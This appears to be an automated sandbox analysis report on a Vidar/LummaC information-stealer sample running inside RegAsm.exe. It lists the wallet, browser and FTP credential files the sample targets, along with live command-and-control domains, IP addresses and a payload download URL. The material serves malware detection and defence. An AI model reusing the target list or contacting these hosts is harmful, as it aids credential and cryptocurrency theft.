Source: RegAsm.exe, 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: RegAsm.exe, 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: keystore
Source: RegAsm.exe, 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Jump to behavior

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\backups\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\	Jump to behavior

Source: Yara match	File source: 00000003.00000002.2429083892.000000000148C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 7520, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match

File source: decrypted.memstr, type: MEMORYSTR

Yara detected Vidar

Source: Yara match

File source: sslproxydump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match	File source: 0.2.file.exe.35b5570.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.35b5570.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegAsm.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegAsm.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1722743408.00000000035B5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2427181341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2429083892.000000000148C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 7420, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 7520, type: MEMORYSTR

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C220C40 sqlite3_bind_zeroblob,	3_2_6C220C40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C220D60 sqlite3_bind_parameter_name,	3_2_6C220D60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C148EA0 sqlite3_clear_bindings,	3_2_6C148EA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C220B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob,	3_2_6C220B40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C146410 bind,WSAGetLastError,	3_2_6C146410
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C14C030 sqlite3_bind_parameter_count,	3_2_6C14C030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C14C050 sqlite3_bind_parameter_index,strlen,strncmp,strncmp,	3_2_6C14C050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C146070 PR_Listen,	3_2_6C146070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C1460B0 listen,WSAGetLastError,	3_2_6C1460B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C0D22D0 sqlite3_bind_blob,	3_2_6C0D22D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C1463C0 PR_Bind,	3_2_6C1463C0

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	2 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	12 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Native API	Boot or Logon Initialization Scripts	511 Process Injection	11 Deobfuscate/Decode Files or Information	1 Credentials in Registry	1 Account Discovery	Remote Desktop Protocol	4 Data from Local System	21 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 PowerShell	Logon Script (Windows)	Logon Script (Windows)	4 Obfuscated Files or Information	Security Account Manager	4 File and Directory Discovery	SMB/Windows Admin Shares	1 Screen Capture	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	2 Software Packing	NTDS	66 System Information Discovery	Distributed Component Object Model	2 Clipboard Data	124 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	161 Security Software Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Masquerading	Cached Domain Credentials	41 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	41 Virtualization/Sandbox Evasion	DCSync	12 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	511 Process Injection	Proc Filesystem	1 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	HTML Smuggling	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
file.exe	26%	ReversingLabs	Win32.Trojan.Generic
file.exe	38%	Virustotal		Browse
file.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner
C:\ProgramData\BKKKEGIDBG.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\66eef0ca0fb35_lfdsa[1].exe	100%	Joe Sandbox ML
C:\ProgramData\freebl3.dll	0%	ReversingLabs
C:\ProgramData\mozglue.dll	0%	ReversingLabs
C:\ProgramData\msvcp140.dll	0%	ReversingLabs
C:\ProgramData\nss3.dll	0%	ReversingLabs
C:\ProgramData\softokn3.dll	0%	ReversingLabs
C:\ProgramData\vcruntime140.dll	0%	ReversingLabs

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Link
steamcommunity.com	0%	Virustotal	Browse
cowod.hopto.org	1%	Virustotal	Browse
captainynfanw.shop	1%	Virustotal	Browse
tearrybyiwo.shop	1%	Virustotal	Browse
appleboltelwk.shop	1%	Virustotal	Browse
tendencerangej.shop	1%	Virustotal	Browse
surveriysiop.shop	1%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label	Link
https://duckduckgo.com/chrome_newtab	0%	URL Reputation	safe
https://duckduckgo.com/ac/?q=	0%	URL Reputation	safe
https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.	0%	URL Reputation	safe
https://captainynfanw.shop/api	100%	Avira URL Cloud	malware
https://tendencerangej.shop/api	100%	Avira URL Cloud	malware
https://steamcommunity.com/?subsection=broadcasts	0%	Avira URL Cloud	safe
https://store.steampowered.c	0%	Avira URL Cloud	safe
https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&	0%	URL Reputation	safe
coursedonnyre.shop	100%	Avira URL Cloud	malware
https://captainynfanw.shop/api	5%	Virustotal		Browse
https://mozilla.org0/	0%	URL Reputation	safe
http://www.entrust.net/rpa03	0%	URL Reputation	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	URL Reputation	safe
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis	0%	URL Reputation	safe
http://crl.entrust.net/2048ca.crl0	0%	URL Reputation	safe
http://cowod.hopto.org	0%	Avira URL Cloud	safe
https://store.steampowered.com/subscriber_agreement/	0%	Avira URL Cloud	safe
https://www.entrust.net/rpa0	0%	URL Reputation	safe
https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&l=english	0%	URL Reputation	safe
http://ocsp.entrust.net03	0%	URL Reputation	safe
http://ocsp.entrust.net02	0%	URL Reputation	safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	URL Reputation	safe
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1	0%	URL Reputation	safe
https://116.203.165.127	100%	Avira URL Cloud	malware
https://tendencerangej.shop/api	5%	Virustotal		Browse
https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6	0%	Avira URL Cloud	safe
coursedonnyre.shop	1%	Virustotal		Browse
https://steamcommunity.com/profiles/76561199780418869/badges	0%	Avira URL Cloud	safe
https://steamcommunity.com/?subsection=broadcasts	0%	Virustotal		Browse
http://cowod.hopto.org	1%	Virustotal		Browse
http://www.valvesoftware.com/legal.htm	0%	Avira URL Cloud	safe
https://store.steampowered.com/subscriber_agreement/	0%	Virustotal		Browse
https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6	0%	Virustotal		Browse
https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp	0%	Avira URL Cloud	safe
https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png	0%	Avira URL Cloud	safe
strappystyio.shop	100%	Avira URL Cloud	malware
http://www.valvesoftware.com/legal.htm	0%	Virustotal		Browse
https://116.203.165.127/vcruntime140.dlln	100%	Avira URL Cloud	malware
https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp	0%	Virustotal		Browse
https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=LC2oZRCs	0%	Avira URL Cloud	safe
http://cowod.hopto.org_DEBUG.zip/c	0%	Avira URL Cloud	safe
https://steamcommunity.com/profiles/76561199780418869/badges	0%	Virustotal		Browse
https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png	0%	Avira URL Cloud	safe
https://116.203.165.127	6%	Virustotal		Browse
https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png	0%	Virustotal		Browse
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17rer.exe	0%	Avira URL Cloud	safe
https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=83YueuslRxGq&l=e	0%	Avira URL Cloud	safe
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi	0%	Avira URL Cloud	safe
https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png	0%	Virustotal		Browse
http://cowod.hopto.org_DEBUG.zip/c	0%	Virustotal		Browse
https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=83YueuslRxGq&l=e	0%	Virustotal		Browse
https://tearrybyiwo.shop/api	5%	Virustotal		Browse
https://tearrybyiwo.shop/api	100%	Avira URL Cloud	malware
https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=LC2oZRCs	0%	Virustotal		Browse
https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback	0%	Avira URL Cloud	safe
http://cowod.hopto.	0%	Avira URL Cloud	safe
https://steamcommunity.com/profiles/76561199780418869u55uhttps://t.me/ae5edMozilla/5.0	0%	Avira URL Cloud	safe
http://147.45.44.104/prog/66eef0ca0fb35_lfdsa.exe	100%	Avira URL Cloud	malware
strappystyio.shop	1%	Virustotal		Browse
http://cowod.hopto	0%	Avira URL Cloud	safe
https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback	0%	Virustotal		Browse
http://147.45.44.104/prog/66eef0ca0fb35_lfdsa.exe	20%	Virustotal		Browse
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94	0%	Avira URL Cloud	safe
https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL	0%	Avira URL Cloud	safe
tearrybyiwo.shop	100%	Avira URL Cloud	malware
https://116.203.165.127/nss3.dllk	100%	Avira URL Cloud	malware
https://steamcommunity.com/profiles/76561199780418869u55uhttps://t.me/ae5edMozilla/5.0	0%	Virustotal		Browse
https://steamcommunity.com/l	0%	Avira URL Cloud	safe
https://t.me/ae5ed	0%	Avira URL Cloud	safe
http://www.mozilla.com/en-US/blocklist/	0%	Avira URL Cloud	safe
https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english	0%	Avira URL Cloud	safe
http://cowod.hoptoDGCAAFB	0%	Avira URL Cloud	safe
https://steamcommunity.com/l	0%	Virustotal		Browse
http://147.45.44.104/prog/66eef0ca0fb35_lfdsa.exe1kkkktoken	100%	Avira URL Cloud	malware
https://t.me/ae5ed	0%	Virustotal		Browse
http://store.steampowered.com/privacy_agreement/	0%	Avira URL Cloud	safe
https://store.steampowered.com/points/shop/	0%	Avira URL Cloud	safe
https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL	0%	Virustotal		Browse
https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta	0%	Avira URL Cloud	safe
tearrybyiwo.shop	1%	Virustotal		Browse
https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=Bh1h47R1I7Wg&a	0%	Avira URL Cloud	safe
https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg	0%	Avira URL Cloud	safe
https://116.203.165.127/vcruntime140.dll2	100%	Avira URL Cloud	malware
https://store.steampowered.com/privacy_agreement/	0%	Avira URL Cloud	safe
https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=QI-9YLc_mdtk&l=en	0%	Avira URL Cloud	safe
https://116.203.165.127/softokn3.dll)	100%	Avira URL Cloud	malware
https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0	0%	Avira URL Cloud	safe
https://116.203.165.127/freebl3.dllI	100%	Avira URL Cloud	malware
surveriysiop.shop	100%	Avira URL Cloud	malware
http://cowod.multipart/form-data;	0%	Avira URL Cloud	safe
http://147.45.44.104/prog/66eef0ca0fb35_lfdsa.exeorm-data;	100%	Avira URL Cloud	malware
https://surveriysiop.shop/api	100%	Avira URL Cloud	malware
https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
steamcommunity.com	92.122.104.90	true	true	0%, Virustotal, Browse	unknown
cowod.hopto.org	45.132.206.251	true	true	1%, Virustotal, Browse	unknown
captainynfanw.shop	188.114.96.3	true	true	1%, Virustotal, Browse	unknown
tearrybyiwo.shop	172.67.203.61	true	true	1%, Virustotal, Browse	unknown
appleboltelwk.shop	104.21.9.6	true	true	1%, Virustotal, Browse	unknown
surveriysiop.shop	188.114.96.3	true	true	1%, Virustotal, Browse	unknown
tendencerangej.shop	104.21.16.38	true	true	1%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://captainynfanw.shop/api	true	5%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://tendencerangej.shop/api	true	5%, Virustotal, Browse Avira URL Cloud: malware	unknown
coursedonnyre.shop	true	1%, Virustotal, Browse Avira URL Cloud: malware	unknown
strappystyio.shop	true	1%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://tearrybyiwo.shop/api	true	5%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://147.45.44.104/prog/66eef0ca0fb35_lfdsa.exe	false	20%, Virustotal, Browse Avira URL Cloud: malware	unknown
tearrybyiwo.shop	true	1%, Virustotal, Browse Avira URL Cloud: malware	unknown
surveriysiop.shop	true	Avira URL Cloud: malware	unknown
https://surveriysiop.shop/api	true	Avira URL Cloud: malware	unknown
https://116.203.165.127/softokn3.dll	true	Avira URL Cloud: malware	unknown
tendencerangej.shop	true	Avira URL Cloud: malware	unknown
https://cowod.hopto.org/	true	Avira URL Cloud: safe	unknown
https://116.203.165.127/freebl3.dll	true	Avira URL Cloud: malware	unknown
https://116.203.165.127/sqlp.dll	true	Avira URL Cloud: malware	unknown
https://steamcommunity.com/profiles/76561199780418869	true	Avira URL Cloud: safe	unknown
https://116.203.165.127/msvcp140.dll	true	Avira URL Cloud: malware	unknown
https://appleboltelwk.shop/api	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	FCAAAA.3.dr	false	URL Reputation: safe	unknown
https://store.steampowered.c	RegAsm.exe, 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/ac/?q=	FCAAAA.3.dr	false	URL Reputation: safe	unknown
https://steamcommunity.com/?subsection=broadcasts	RegAsm.exe, 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2429083892.000000000148C000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://cowod.hopto.org	RegAsm.exe, 00000003.00000002.2427181341.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.	RegAsm.exe, 00000003.00000002.2429083892.000000000148C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2429083892.0000000001605000.00000004.00000020.00020000.00000000.sdmp, JJDBGD.3.dr	false	URL Reputation: safe	unknown
https://store.steampowered.com/subscriber_agreement/	RegAsm.exe, 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2429083892.000000000148C000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://116.203.165.127	76561199780418869[1].htm.3.dr	false	6%, Virustotal, Browse Avira URL Cloud: malware	unknown
